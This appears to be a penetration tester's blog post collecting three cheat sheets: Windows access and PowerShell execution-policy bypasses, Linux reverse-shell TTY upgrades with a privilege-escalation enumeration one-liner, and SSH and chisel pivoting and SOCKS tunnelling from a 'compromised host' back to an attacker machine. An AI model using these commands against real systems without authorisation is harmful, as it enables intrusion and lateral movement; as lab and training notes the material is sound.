New blog post!

Why? I’ve somehow managed to break my bparrot install on an old laptop…

There are 3 files that I want to keep, so for now they’ll live here :)

File 1 - Windows notes

RDP from Linux

xfreerdp /v:$vip /u:$user /p:$pass /cert:ignore /dynamic-resolution +clipboard

Transfer over SMB

On Linux

sudo -E ~/.local/bin/smbserver.py share $(pwd) -smb2support

On Windows

copy \\10.10.16.11\share\work.exe

POWERSHELL Policy Stuff

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

Or

Get-Content -Raw <FILE> | iex

or

powershell -EncodedCommand <Base64encodedcommands>

File 2 - Low-Hanging Privilege Escalation on Linux

Try to Spawn a TTY

python -c 'import pty; pty.spawn("/bin/sh")' || python3 -c 'import pty; pty.spawn("/bin/sh")' || /usr/bin/script -qc /bin/sh /dev/null

Then type CTRL+Z to suspend the process and return to the main shell

Get the number of columns using

stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'

Which should output something like

rows 30
columns 116

Return to the reverse shell using

stty raw -echo; fg

In the reverse shell set the correct number of terminals using

stty rows <ROWS> cols <COLUMNS>

So in this example

stty rows 30 cols 116

Then set the terminal using

export TERM=xterm-256color

Tiny privesc check

echo "--ID--";id;echo "--ENV--";env;echo "--SUID--";find / -perm -u=s -type f 2>/dev/null; echo "--CAPABILITIES--"; getcap -r / 2>/dev/null; echo "--EXPORTS--"; cat /etc/exports;echo "--CRONTAB--"; cat /etc/crontab;echo "--APP ARMOR ENTRIES--";ls /etc/apparmor.d/; echo "--SUDO--"; sudo -l

File 3 - Simple pivoting commands

Portforwarding

SSH
ssh -Nf -L <local_ip>:<local_port>:<destination_ip>:><remote_port> <user>@<IP>

For example to get access to a localhost only MySQL database on 10.20.30.40

ssh -Nf -L 127.0.0.1:3306:127.0.0.1:3306 victim@10.20.30.40

So any time you try to access your localhost on port 3306 it will instead go through the SSH tunnel to the SSH host’s localhost on port 3306.

The first 127.0.0.1 is not needed, as it’s implied. So you could shorten it using this

ssh -Nf -L 3306:127.0.0.1:3306 victim@10.20.30.40

You also don’t need to use the same local port, as the remote port. So instead you could use the 33306 port.

ssh -Nf -L 33306:127.0.0.1:3306 victim@10.20.30.40

So now any traffic sent over 127.0.0.1:33306 will go through the SSH tunnel to 127.0.0.1:3306

This also doesn’t need to be just to 127.0.0.1, so to access resources on an internal network, like an HTTP server with the IP 192.168.20.1, you can use this.

ssh -Nf -L 8000:192.168.20.1:80 victim@10.20.30.40

So any traffic sent to 127.0.0.1:8000 goes through the SSH tunnel and out to 192.168.20.1:80

Chisel

Setup a chisel server on your host using chisel

chisel server --port <PORT> --reverse

Then on the compromised server

chisel client <ATTACKER_IP>:<ATTACKER_PROXY_PORT> R:<LISTENING_IP>:<LISTEN_PORT>:<SEND_IP>:<SEND_PORT>

An example to access an internal server on 127.0.0.1:3389 on the compromised host (10.20.30.40) run

Linux host (10.10.10.10)

chisel server --port 1234 --reverse

Compromised host

chisel client 10.10.10.10:1234 R:127.0.0.1:4242:127.0.0.1:3389

Now any traffic sent on the Linux host to 127.0.0.1:4242 goes through chisel to the compromised host’s 127.0.0.1:3389

Proxying

SSH
ssh -D <proxy_port> -Nf <user>@<victim_ip>

For example to setup a proxy on port 6666

ssh -D 6666 -Nf victim@10.20.30.40
Chisel

Setup a chisel server on your host using chisel

chisel server --port <PORT> --reverse --socks5

Then on the compromised server

chisel client <ATTACKER_IP>:<ATTACKER_PROXY_PORT> R:<PROXY_PORT>:SOCKS

An example to setup a proxy on port 7676.

Your host (10.10.10.10)

chisel server --port 1234 --reverse --socks

Compromised host

chisel client 10.10.10.10:1234 R:7676:SOCKS
Using the proxy

Now that we’ve got a SOCKS proxy setup, (let’s just say that it’s on port 8080) how do we use it?

Proxychains

ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4a/5 or HTTP proxies. Source

Basically it hooks LIBC and forces connections made by LIBC to use the proxy.

Usage is pretty easy, albeit slow sometimes…

What I tend to do is copy the /etc/proxychains.conf to the current working directory and editing the last line with this syntax.

socks5 127.0.0.1 <PROXY_PORT>

So in this example.

socks5 127.0.0.1 8080

Then to use it, just run

proxychains -f ./proxychains.conf <COMMAND>

You could also set the PROXYCHAINS_SOCKS5 environmental variable instead of messing with the config file.

PROXYCHAINS_SOCKS5=<PROXY_PORT> proxychains <COMMAND>
<
Previous Post
What’s the purpose of this blog?
>
Next Post
Reel Writeup